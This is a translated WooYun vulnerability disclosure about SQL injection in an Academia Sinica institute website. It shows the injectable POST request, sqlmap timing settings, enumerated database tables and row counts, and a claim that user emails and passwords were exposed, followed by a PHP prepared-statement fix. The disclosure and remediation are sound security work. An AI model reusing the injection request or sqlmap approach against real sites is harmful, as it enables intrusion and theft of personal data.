Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0162795

Title: SQL injection in a research institute of Academia Sinica, Taiwan (DBA privileges; leaks sensitive information such as user email addresses and passwords) (Taiwan region)

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 路人甲

Submitted: 2015-12-21 00:09

Fixed: 2016-01-12 15:35

Published: 2016-01-12 15:35

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-12-21: Details sent to the vendor; awaiting vendor handling
2015-12-23: Vendor has confirmed; details disclosed to the vendor only
2016-01-02: Details disclosed to core white hats and experts in the relevant field
2016-01-12: Details disclosed to ordinary white hats
2016-01-12: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public

Brief description:

As in the title.

Detailed description:

URL: **.**.**.**
Institute of National History, Academia Sinica, Taiwan

[Screenshot: 站点.png (the target site)]


A SQL injection vulnerability exists in the following request:

POST /publish-data_01_UP.php HTTP/1.1
Content-Length: 249
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=23ceae6af0c0411a6d42623df9b1917a
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ckUP_0=7851&ckUP_1=7849&ckUP_2=*&ckUP_3=7847&ckUP_4=7846&ckUP_5=7845&ckUP_6=7844&ckUP_7=7843&ckUP_8=7842&ckUP_9=7841


The ckUP_2 parameter is not properly filtered. Verifying with sqlmap requires setting --time-sec to 15 seconds; UNION-based injection is also possible.

[Screenshot: 注入证明.png (injection proof)]


Proof of vulnerability:

4 databases are involved.

[Screenshot: 4个库.jpg (the four databases)]


135 tables:
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: ith
[135 tables]
+------------------------------+
| cast |
| year |
| acad_download |
| acad_faq |
| acad_meeting |
| acad_regisman |
| acad_regisshow |
| acad_registration |
| acad_vdeo |
| acad_vdeounit |
| academia |
| academic |
| affiche |
| affiche_download |
| animation |
| application_expendablet |
| appliesconference |
| article |
| article_add |
| article_purchase |
| bibl_cast |
| bibl_content |
| bibl_content_alerts |
| bibl_field |
| bibl_field_down |
| bibl_place |
| bibl_second |
| bibliography |
| bo_content |
| bo_download |
| boardroom |
| boffin |
| boondoggle |
| boondoggle_affiliate |
| cahier |
| cahier_bracket |
| code |
| code_bracket |
| contact |
| counter |
| counter1 |
| counter2 |
| display_calendar |
| display_carousel |
| display_information |
| display_seconds |
| download |
| download_unit |
| edition_group |
| file_achi |
| file_achi_dow |
| file_achi_layer |
| file_achi_layer_dow |
| file_awak |
| file_awak_dow |
| file_banner |
| file_calendar |
| file_coll |
| file_hist |
| file_hist_inst |
| file_hist_team |
| file_hist_type |
| file_inst |
| file_inst_coop |
| file_inst_hist |
| file_muse |
| file_muse_layer |
| file_reso |
| file_reso_dow |
| file_reso_layer |
| file_reso_layer_dow |
| file_reso_triplex |
| file_reso_triplex_dow |
| file_serv |
| file_serv_capt |
| file_serv_dow |
| file_spec |
| file_spec_layer |
| file_spec_triplex |
| file_visi |
| ifrm |
| ifrm1 |
| interent |
| interent_bracket |
| introduction |
| issue |
| lease |
| lease_class |
| lease_goods |
| manager |
| manager_unit |
| news |
| number |
| opening |
| place |
| quantity |
| quarterly |
| quarterly_bulletin |
| quarterly_committeeman |
| quarterly_contact |
| quarterly_magazine |
| quarterly_magazine_content |
| quarterly_new_content_alerts |
| quarterly_received |
| quarterly_subscribe |
| recording |
| research |
| research_affiliate |
| special |
| special_author |
| special_class |
| speinputs_inventory |
| speinputs_ordgup |
| speinputs_orlist |
| speinputs_purse |
| speinputs_sales |
| speinputs_sales_main |
| symp_acad_download |
| symp_acad_meeting |
| symp_acad_regisman |
| symp_acad_regisshow |
| symp_acad_registration |
| symp_academia |
| symp_agenda |
| symp_agendacom |
| symp_conpap |
| symp_conpapfile |
| symp_life |
| symp_life_album |
| symp_news |
| symp_origin |
| symp_participate |
| symp_website |
| working |
| working_download |
+------------------------------+
Database: ith
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| recording | 28844 |
| bibliography | 9463 |
| acad_regisshow | 8277 |
| acad_regisman | 7170 |
| appliesconference | 2250 |
| file_calendar | 2190 |
| symp_acad_regisshow | 933 |
| symp_acad_regisman | 819 |
| quarterly_magazine_content | 635 |
| affiche | 524 |
| affiche_download | 512 |
| academia | 483 |
| application_expendablet | 472 |
| bo_content | 451 |
| article_purchase | 423 |
| acad_meeting | 342 |
| number | 325 |
| bibl_second | 312 |
| display_calendar | 300 |
| contact | 298 |
| acad_registration | 297 |
| special_author | 273 |
| news | 247 |
| file_awak | 208 |
| manager | 183 |
| acad_download | 179 |
| file_spec_layer | 178 |
| speinputs_inventory | 175 |
| interent | 165 |
| boffin | 149 |
| special | 137 |
| quarterly_magazine | 122 |
| speinputs_purse | 111 |
| download | 95 |
| article | 77 |
| bibl_cast | 65 |
| bo_download | 63 |
| symp_conpapfile | 63 |
| article_add | 54 |
| display_information | 54 |
| quarterly_bulletin | 44 |
| file_spec | 41 |
| research_affiliate | 41 |
| lease_goods | 37 |
| lease | 34 |
| bibl_content_alerts | 29 |
| symp_life | 29 |
| special_class | 20 |
| bibl_field_down | 19 |
| file_banner | 19 |
| edition_group | 18 |
| symp_agendacom | 15 |
| symp_news | 15 |
| file_coll | 14 |
| file_hist | 14 |
| file_inst | 14 |
| manager_unit | 14 |
| file_hist_inst | 13 |
| file_inst_hist | 13 |
| file_serv | 13 |
| interent_bracket | 13 |
| opening | 13 |
| display_carousel | 12 |
| working_download | 12 |
| bibl_field | 11 |
| file_serv_dow | 11 |
| introduction | 11 |
| symp_acad_meeting | 11 |
| research | 10 |
| download_unit | 7 |
| symp_acad_download | 7 |
| symp_agenda | 7 |
| symp_conpap | 7 |
| academic | 6 |
| file_reso_triplex | 6 |
| file_spec_triplex | 6 |
| quantity | 6 |
| symp_acad_registration | 6 |
| file_inst_coop | 5 |
| ifrm | 5 |
| symp_academia | 5 |
| symp_life_album | 5 |
| symp_participate | 5 |
| symp_website | 5 |
| working | 5 |
| animation | 4 |
| file_hist_team | 4 |
| file_hist_type | 4 |
| lease_class | 4 |
| acad_faq | 3 |
| bibl_place | 3 |
| file_achi | 3 |
| file_muse | 3 |
| file_muse_layer | 3 |
| file_reso | 3 |
| file_reso_layer | 3 |
| file_serv_capt | 3 |
| file_visi | 3 |
| issue | 3 |
| place | 3 |
| quarterly | 3 |
| quarterly_committeeman | 3 |
| quarterly_contact | 3 |
| quarterly_received | 3 |
| quarterly_subscribe | 3 |
| symp_origin | 3 |
| `cast` | 2 |
| boardroom | 2 |
| speinputs_ordgup | 2 |
| `year` | 1 |
| bibl_content | 1 |
| code_bracket | 1 |
| counter | 1 |
| counter1 | 1 |
| counter2 | 1 |
| display_seconds | 1 |
| ifrm1 | 1 |
+----------------------------+---------+
Sensitive user data is involved, including passwords and email addresses.

[Screenshot: 数据 (2).png (sample data)]

Remediation:

Filter the parameters.
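The remediation above is a single line, so here is what "filter the parameters" looks like in practice for a handler shaped like publish-data_01_UP.php. This is an added example written for this page, not the affected site's code: the table and column names (publication, sort_order, id), the database account app_user and the meaning of the ckUP_n values as record IDs are all assumptions; the database name ith is the one shown in the sqlmap output above. The fix has two independent layers: every ckUP_n value is validated as a positive integer before it is used, and the query is a prepared statement so the values are bound as data rather than spliced into SQL text. The connection also uses a least-privilege account, since the report notes the vulnerable site's account held DBA rights.

```php
<?php
// Added example (not the affected site's code). Table/column names, the
// app_user account and the meaning of ckUP_n as record IDs are assumptions.
declare(strict_types=1);

// Vulnerable pattern, shown for contrast only: the raw POST value becomes part
// of the SQL text, so any input that is not a plain number changes the query.
//   $sql = "UPDATE publication SET sort_order = $i WHERE id = " . $_POST["ckUP_$i"];

/**
 * Collect ckUP_0 .. ckUP_{count-1} from the request as integers.
 * Returns null if any value is missing or is not a positive integer.
 */
function collectIds(array $post, int $count = 10): ?array
{
    $ids = [];
    for ($i = 0; $i < $count; $i++) {
        $key = "ckUP_$i";
        if (!isset($post[$key])) {
            return null;
        }
        // FILTER_VALIDATE_INT accepts only a plain decimal integer: "*", "",
        // "1e3" or a number followed by anything else is rejected, and
        // min_range rejects zero and negative IDs.
        $id = filter_var($post[$key], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            return null;
        }
        $ids[$i] = $id;
    }
    return $ids;
}

/**
 * Apply the new ordering with one prepared statement executed per row.
 * The values travel as bound parameters, never as part of the SQL string,
 * so even a value that slipped past validation could not alter the query.
 */
function updateOrder(PDO $pdo, array $ids): void
{
    $stmt = $pdo->prepare('UPDATE publication SET sort_order = :pos WHERE id = :id');
    $pdo->beginTransaction();
    try {
        foreach ($ids as $pos => $id) {
            $stmt->execute([':pos' => $pos, ':id' => $id]);
        }
        $pdo->commit();
    } catch (PDOException $e) {
        $pdo->rollBack();
        throw $e;
    }
}

$ids = collectIds($_POST);
if ($ids === null) {
    // Reject the whole request rather than "cleaning" a bad value; a 400 here
    // is also a useful signal in access logs for a probe against this endpoint.
    http_response_code(400);
    exit('invalid parameters');
}

// Connect as an application account that can only UPDATE the tables this
// page needs (assumed name app_user; password is a placeholder), not as a
// DBA account. Server-side prepares keep the query text fixed on the server.
$pdo = new PDO('mysql:host=localhost;dbname=ith;charset=utf8mb4', 'app_user', 'REPLACE_ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
updateOrder($pdo, $ids);
```

With this in place the original request body (ckUP_2=*) is refused with a 400 before any SQL runs, and a time-based or UNION-based payload that reached the query would still be bound as a parameter. Validation and prepared statements are kept separate on purpose: the first gives a clear error and a log signal, the second makes the query safe regardless of what the first lets through.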

Copyright notice: when reproducing, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-23 04:06

Vendor reply:

Thank you for the report.

Latest status:

2016-01-12: Fixed